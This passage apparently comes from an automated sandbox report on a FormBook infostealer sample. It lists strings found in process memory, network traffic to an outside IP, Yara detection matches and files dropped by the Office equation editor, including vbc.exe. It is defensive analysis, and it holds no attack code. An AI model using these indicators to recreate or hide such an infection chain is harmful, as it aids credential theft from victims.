          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2208077400.000000000B149000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownHTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
